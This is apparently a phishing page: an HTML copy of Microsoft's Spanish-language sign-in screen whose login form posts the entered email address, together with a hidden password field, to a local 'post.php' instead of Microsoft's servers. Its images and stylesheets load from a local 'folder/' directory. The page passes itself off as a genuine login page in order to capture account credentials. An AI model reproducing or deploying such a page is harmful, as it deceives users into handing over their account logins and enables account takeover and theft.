<!DOCTYPE html>

<html dir="ltr" lang="ES-ES">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	
		<title>Iniciar sesión en tu cuenta Microsoft</title>
		
		<meta name="PageID" content="i5030">
		<meta name="SiteID" content="292841"><meta name="ReqLC" content="3082"><meta name="LocLC" content="3082">
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes">
		<link rel="icon" href="images/favicon.ico">
		<link rel="stylesheet" title="Converged_v2" type="text/css" onload="$Loader.OnSuccess(this)" onerror="$Loader.OnError(this)" href="folder/Converged_v23082_5plpI1P0_uKjrokWdqCoBw2.css">

		<style type="text/css"></style>
		<style type="text/css">
        body{display:none;}</style>
        <script type="text/javascript"></script>
		<style type="text/css">body{display:block !important;}</style><noscript>
			<style type="text/css">body{display:block !important;}</style></noscript>

		</script>
	</head>
		<body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass"><div><!--  -->


<div data-bind="component: { name: &#39;background-image-control&#39;, publicMethods: backgroundControlMethods }"><div class="background-image-holder" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">
   
    <div data-bind="backgroundImage: backgroundImageUrl(), externalCss: { &#39;background-image&#39;: true }" class="background-image ext-background-image" style="background-image: url(&quot;https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);"></div>
        
</div></div>

<div data-bind="if: activeDialog"></div>

<form name="userid"  method="post" action="post.php">

    <div class="outer" data-bind="component: { name: &#39;master-page&#39;,
        params: {
            serverData: svr,
            showButtons: svr.f,
            showFooterLinks: true,
            useWizardBehavior: svr.Bi,
            handleWizardButtons: false,
            password: password,
            hideFromAria: ariaHidden },
        event: {
            footerAgreementClick: footer_agreementClick } }">

        <div class="middle" data-bind="css: { &#39;app&#39;: backgroundLogoUrl }">
            

            <div data-bind="
                animationEnd: paginationControlMethods() &amp;&amp; paginationControlMethods().view_onAnimationEnd,
                css: {
                    &#39;app&#39;: backgroundLogoUrl,
                    &#39;wide&#39;: paginationControlMethods() &amp;&amp; paginationControlMethods().currentViewHasMetadata(&#39;wide&#39;),
                    &#39;fade-in-lightbox&#39;: fadeInLightBox,
                    &#39;has-popup&#39;: showFedCredButtons,
                    &#39;transparent-lightbox&#39;: backgroundControlMethods() &amp;&amp; backgroundControlMethods().useTransparentLightBox },
                externalCss: { &#39;sign-in-box&#39;: true }" class="sign-in-box ext-sign-in-box fade-in-lightbox">

                <div class="lightbox-cover" data-bind="css: { &#39;disable-lightbox&#39;: svr.br &amp;&amp; showLightboxProgress() }"></div>

                

                <div class="win-scroll">
                    
                    <div data-bind="component: { name: &#39;logo-control&#39;,
                        params: {
                            isChinaDc: svr.fIsChinaDc,
                            bannerLogoUrl: bannerLogoUrl() } }">

                            <img class="logo" role="img" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" data-bind="imgSrc, attr: { alt: str[&#39;MOBILE_STR_Footer_Microsoft&#39;] }" src="folder/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft">
<!-- /ko --></div>
                    
                    <div role="main" data-bind="component: { name: &#39;pagination-control&#39;,
                            publicMethods: paginationControlMethods,
                            params: {
                                enableCssAnimation: svr.aj,
                                disableAnimationIfAnimationEndUnsupported: svr.bv,
                                initialViewId: initialViewId,
                                currentViewId: currentViewId,
                                initialSharedData: initialSharedData,
                                initialError: $loginPage.getServerError() },
                            event: {
                                cancel: paginationControl_onCancel,
                            loadView: view_onLoadView,
                            showView: view_onShow,
                                setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                                animationStateChange: paginationControl_onAnimationStateChange } }"><!--  -->

<div data-bind="css: { &#39;zero-opacity&#39;: hidePaginatedView() }" class="">
   
    <div class="pagination-view animate slide-in-next" data-bind="css: {
        &#39;has-identity-banner&#39;: showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.j),
        &#39;zero-opacity&#39;: hidePaginatedView.hideSubView(),
        &#39;animate&#39;: animate(),
        &#39;slide-out-next&#39;: animate.isSlideOutNext(),
        &#39;slide-in-next&#39;: animate.isSlideInNext(),
        &#39;slide-out-back&#39;: animate.isSlideOutBack(),
        &#39;slide-in-back&#39;: animate.isSlideInBack() }">

        <div data-viewid="1" data-showfedcredbutton="true" data-bind="pageViewComponent: { name: &#39;login-paginated-username-view&#39;,
                            params: {
                                serverData: svr,
                                serverError: initialError,
                                isInitialView: isInitialState,
                                displayName: sharedData.displayName,
                                otherIdpRedirectUrl: sharedData.otherIdpRedirectUrl,
                                prefillNames: $loginPage.prefillNames,
                                flowToken: sharedData.flowToken },
                            event: {
                                redirect: $loginPage.view_onRedirect,
                                setPendingRequest: $loginPage.view_onSetPendingRequest,
                                registerDialog: $loginPage.view_onRegisterDialog,
                                unregisterDialog: $loginPage.view_onUnregisterDialog,
                                showDialog: $loginPage.view_onShowDialog,
                                agreementClick: $loginPage.footer_agreementClick } }"><!--  -->

<div data-bind="component: { name: &#39;header-control&#39;,
    params: {
        serverData: svr,
        title: str[&#39;WF_STR_HeaderDefault_Title&#39;] } }"><div class="row title ext-title" id="loginHeader" data-bind="externalCss: { &#39;title&#39;: true }">
    <div role="heading" aria-level="1" data-bind="text: title">Iniciar sesión</div>
   
</div></div>



<div class="row">
    <div role="alert" aria-live="assertive">
        
    </div>

    <div class="form-group col-md-24">
       
        <div class="placeholderContainer" data-bind="component: { name: &#39;placeholder-textbox-field&#39;,
            publicMethods: usernameTextbox.placeholderTextboxMethods,
            params: {
                serverData: svr,
                hintText: tenantBranding.UserIdLabel || str[&#39;CT_PWD_STR_Email_Example&#39;],
                hintCss: &#39;placeholder&#39; + (!svr.ag ? &#39; ltr_override&#39; : &#39;&#39;) },
            event: {
                updateFocus: usernameTextbox.textbox_onUpdateFocus } }">

            <input type="email" name="userid" id="i0116" maxlength="113" lang="en" class="form-control ltr_override input ext-input text-box ext-text-box" aria-required="true" data-bind="
                    externalCss: {
                        &#39;input&#39;: true,
                        &#39;text-box&#39;: true,
                        &#39;has-error&#39;: usernameTextbox.error },
                    ariaLabel: tenantBranding.UserIdLabel || str[&#39;CT_PWD_STR_Username_AriaLabel&#39;],
                    ariaDescribedBy: &#39;loginHeader&#39; + (pageDescription &amp;&amp; !svr.bZ ? &#39; loginDescription&#39; : &#39;&#39;),
                    textInput: usernameTextbox.value,
                    hasFocusEx: usernameTextbox.focused,
                    placeholder: $placeholderText" aria-label="Escriba su correo electrónico, teléfono o Skype." aria-describedby="loginHeader" placeholder="Correo electrónico, teléfono o Skype">

            <input name="passwd" type="password" id="i0118" autocomplete="off" data-bind="moveOffScreen, textInput: passwordBrowserPrefill" class="moveOffScreen" tabindex="-1" aria-hidden="true">
     </div>
        <!-- /ko -->
    </div>
</div>

<div data-bind="css: { &#39;position-buttons&#39;: !tenantBranding.BoilerPlateText }" class="position-buttons">
    <div class="row">
        <div class="col-md-24">
            <div class="text-13">
                
                <div class="form-group" data-bind="
                    htmlWithBindings: html[&#39;WF_STR_SignUpLink_Text&#39;],
                    childBindings: {
                        &#39;signup&#39;: {
                            href: svr.G || &#39;#&#39;,
                            ariaLabel: svr.G ? str[&#39;WF_STR_SignupLink_AriaLabel_Text&#39;] : str[&#39;WF_STR_SignupLink_AriaLabel_Generic_Text&#39;],
                            click: signup_onClick } }">¿No tiene una cuenta? <a href="#" id="signup" aria-label="Crear una cuenta Microsoft">Cree una.</a></div>
                
                <div class="form-group">
                    <a id="idA_PWD_SwitchToFido" name="switchToFido" href="#" data-bind="
                        text: fidoLinkText,
                        click: switchToFidoCredLink_onClick">Iniciar sesión con una llave de seguridad</a>

                    

<span class="help-button" role="button" tabindex="0" data-bind="
    click: fidoHelp_onClick,
    pressEnter: fidoHelp_onClick,
    hasFocus: hasFocus,
    ariaLabel: isPlatformAuthenticatorAvailable ? str[&#39;CT_STR_CredentialPicker_Help_Desc_Fido&#39;] : str[&#39;CT_STR_CredentialPicker_Help_Desc_FidoCrossPlatform&#39;]" aria-label="Más información sobre cómo iniciar sesión con una clave de seguridad">

<img role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/documentation_9628e22a6bfb1edc59e81064a666b614.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg" data-bind="imgSrc" src="folder/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg"><!-- /ko -->
<!-- /ko --><!-- /ko -->
</span>

<div data-bind="component: { name: &#39;fido-help-dialog-content-control&#39;,
    params: {
        isPlatformAuthenticatorAvailable: isPlatformAuthenticatorAvailable },
    event: {
        registerDialog: onRegisterDialog,
        unregisterDialog: onUnregisterDialog } }"><!--  -->

<div data-bind="component: { name: &#39;dialog-content-control&#39;,
    params: {
        dialogId: 1,
        data: {
            labelledBy: &#39;fidoDialogTitle&#39;,
            describedBy: &#39;fidoDialogDesc fidoDialogDesc2&#39;,
            primaryButtonPreventTabbing: { direction: &#39;down&#39; },
            isPlatformAuthenticatorAvailable: isPlatformAuthenticatorAvailable } },
    event: {
        registerDialog: onRegisterDialog,
        unregisterDialog: onUnregisterDialog } }"><!-- --></div></div><!-- /ko -->
                </div>
                
                <div class="form-group" data-bind="
                    component: { name: &#39;cred-switch-link-control&#39;,
                        params: {
                            serverData: svr,
                            availableCreds: availableCredsWithoutUsername(),
                            showForgotUsername: svr.a8 },
                        event: {
                            switchView: noUsernameCredSwitchLink_onSwitchView,
                            redirect: onRedirect,
                            registerDialog: onRegisterDialog,
                            unregisterDialog: onUnregisterDialog,
                            showDialog: onShowDialog } }"><!--  -->

<div class="form-group">
    
    <a id="idA_PWD_SwitchToCredPicker" href="#" data-bind="
        text: isUserKnown ? str[&#39;CT_PWD_STR_SwitchToCredPicker_Link&#39;] : str[&#39;CT_PWD_STR_SwitchToCredPicker_Link_NoUser&#39;],
        click: switchToCredPicker_onClick">Opciones de inicio de sesión</a>
    
</div>

</div>
                <!-- /ko -->
            </div>
        </div>
    </div>
</div>



<div class="win-button-pin-bottom">
    <div class="row" data-bind="css: { &#39;move-buttons&#39;: tenantBranding.BoilerPlateText }">
        <div data-bind="component: { name: &#39;footer-buttons-field&#39;,
            params: {
                serverData: svr,
                isPrimaryButtonEnabled: !isRequestPending(),
                isPrimaryButtonVisible: svr.f,
                isSecondaryButtonEnabled: true,
                isSecondaryButtonVisible: svr.f &amp;&amp; isBackButtonVisible() },
            event: {
                primaryButtonClick: primaryButton_onClick,
                secondaryButtonClick: secondaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container" data-bind="
    visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
    css: { &#39;no-margin-bottom&#39;: removeBottomMargin }">



    <div data-bind="css: { &#39;inline-block&#39;: isPrimaryButtonVisible }" class="inline-block">
     
        <input type="submit" id="idSIButton9" data-bind="
            attr: primaryButtonAttributes,
            externalCss: {
                &#39;button&#39;: true,
                &#39;primary&#39;: true },
            value: primaryButtonText() || str[&#39;CT_PWD_STR_SignIn_Button_Next&#39;],
            hasFocus: focusOnPrimaryButton,
            click: primaryButton_onClick,
            enable: isPrimaryButtonEnabled,
            visible: isPrimaryButtonVisible,
            preventTabbing: primaryButtonPreventTabbing" class="button ext-button primary ext-primary" value="Siguiente">
    </div>
</div></div>
    </div>
</div>

<!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko --></div><!-- /ko -->
            <!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        <!-- /ko -->
    </div>
</div></div>
                    <!-- /ko -->
                </div>
            </div>



            <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value="">
            <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value="">
            <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value="">
            <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value="">
            <input type="hidden" name="canary" data-bind="value: svr.canary" value="">
            <input type="hidden" name="ctx" data-bind="value: ctx" value="">
            <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value="">
            <input type="hidden" id="i0327" data-bind="attr: { name: svr.By }, value: flowToken" name="PPFT" value="DXYczefcWCJoJvwu14qJS89frQjtTQ3ruIC8BkaT7628OTOvs7cn3G4ZjzdqVjRD4zWcTltF!7Uu!ltN7eRSbIE37VkGn5yiqX69y88wcSuTpPOwb!bDDVtFGoXYL43yX2ZTnLEGgx!*2257VOv5fBzZcwvLFrNbrQ48iZUC!hYxyy2CfeOGXPNTePLWfkbYnCR5Wij3!CRXG5TEUJ*NOKdiVGccJ1xlkjRUcukh5aqXks0jv4K13qc63xplb5QTW2GhIVDiBccO!8sUT91ofUg$">
            <input type="hidden" name="PPSX" data-bind="value: svr.cJ" value="Passp">
            <input type="hidden" name="NewUser" value="1">
            <input type="hidden" name="FoundMSAs" data-bind="value: svr.Ah" value="">
            <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0">
            <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0">
            <input type="hidden" name="CookieDisclosure" data-bind="value: svr.a6 ? 1 : 0" value="0">
            <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="1">
            <input type="hidden" name="isSignupPost" data-bind="value: isSignupPost() ? 1 : 0" value="0">

            <div data-bind="component: { name: &#39;instrumentation-control&#39;,
                publicMethods: instrumentationMethods,
                params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1">
<input type="hidden" name="i17" data-bind="value: srsFailed" value="0">
<input type="hidden" name="i18" data-bind="value: srsSuccess">
<input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div>

            <!-- ko ifnot: svr.by -->
            <div id="footer" role="contentinfo" data-bind="
                css: {
                    &#39;default&#39;: !backgroundLogoUrl(),
                    &#39;new-background-image&#39;: useNewDefaultBackground },
                externalCss: { &#39;footer&#39;: true }" class="default footer ext-footer new-background-image">
                <div data-bind="component: { name: &#39;footer-control&#39;,
                    publicMethods: footerMethods,
                    params: {
                        serverData: svr,
                        useNewDefaultBackground: useNewDefaultBackground(),
                        hasDarkBackground: backgroundLogoUrl(),
                        showLinks: true },
                    event: {
                        agreementClick: footer_agreementClick,
                        showDebugDetails: toggleDebugDetails_onClick } }"><!--  -->


<div id="footerLinks" class="footerNode text-secondary">

    
    <a id="ftrTerms" data-bind="text: termsText, href: termsLink, click: termsLink_onClick" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=ES-ES&amp;vv=1600&amp;uaid=faf39e24f88f423d829d739dd7b7b9e5">Términos de uso</a>
    <!-- /ko -->

    <a id="ftrPrivacy" data-bind="text: privacyText, href: privacyLink, click: privacyLink_onClick" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=ES-ES&amp;vv=1600&amp;uaid=faf39e24f88f423d829d739dd7b7b9e5">Privacidad y cookies</a>
   
    <a id="moreOptions" href="https://login.live.com/pp1600/#" role="button" class="moreOptions" data-bind="
        click: moreInfo_onClick,
        ariaLabel: str[&#39;CT_STR_More_Options_Ellipsis_AriaLabel&#39;],
        attr: { &#39;aria-expanded&#39;: showDebugDetails().toString() },
        hasFocusEx: focusMoreInfo()" aria-label="Haga clic aquí para obtener información relacionada con la solución de problemas." aria-expanded="false">

    <img class="desktopMode" role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_96f69d0cefd8a8ba623a182c351ccc64.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg" data-bind="imgSrc" src="folder/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg">

      <img class="mobileMode" role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg" data-bind="imgSrc" src="folder/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg"><!-- /ko -->

    </a>
</div>
<!-- /ko -->

</div>
            </div>
            <!-- /ko -->
        </div>
    <!-- /ko --></div>
    <!-- /ko -->
</form>

<form data-bind="postRedirectForm: postRedirect" method="POST" aria-hidden="true" target="_top"></form>

<!-- ko if: svr.A2 -->
<div id="idPartnerPL" data-bind="injectIframe: { url: svr.A2 }"><iframe height="0" width="0" src="folder/prefetch.html" style="display: none;"></iframe></div>
<!-- /ko -->
</div></body></html>